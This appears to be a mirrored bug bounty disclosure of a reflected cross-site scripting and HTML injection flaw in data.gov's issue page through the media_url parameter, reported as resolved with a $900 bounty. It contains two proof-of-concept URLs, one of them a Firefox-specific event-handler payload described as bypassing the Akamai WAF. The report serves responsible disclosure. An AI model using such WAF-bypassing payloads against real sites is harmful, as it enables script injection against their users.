Loading HuntDB...

HTML injection (with XSS possible) on the https://www.data.gov/issue/ using media_url attribute

Medium
G
GSA Bounty
Submitted None
Reported by sp1d3rs

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
##Description Hello. I discovered Cross-Site scripting issue on the https://www.data.gov/issue/ endpoint. ##Akamai WAF and bypass At the srart i was not able to do the XSS due to Akamai Waf XSS filters, but later, i was able to bypass it. ##POC (HTML injection) https://www.data.gov/issue/?media_url=catalog.data.gov/dataset/consumer-complaint-database%22%3E%3Csvg%20height=%22100%22%20width=%22100%22%3E%20%3Ccircle%20cx=%2250%22%20cy=%2250%22%20r=%2240%22%20stroke=%22black%22%20stroke-width=%223%22%20fill=%22red%22%20/%3E%20%3C/svg%3E {F215755} ##POC (Reflected XSS) Use this link in the Mozilla Firefox https://www.data.gov/issue/?media_url=catalog.data.gov/dataset/consumer-complaint-database%22%3E%3C/div%3E%3C/div%3E%3Cbrute%20onbeforescriptexecute=%27confirm(document.domain)%27%3E {F215768} ##Suggested fix Sanitize all input fields on this page.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$900.00

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected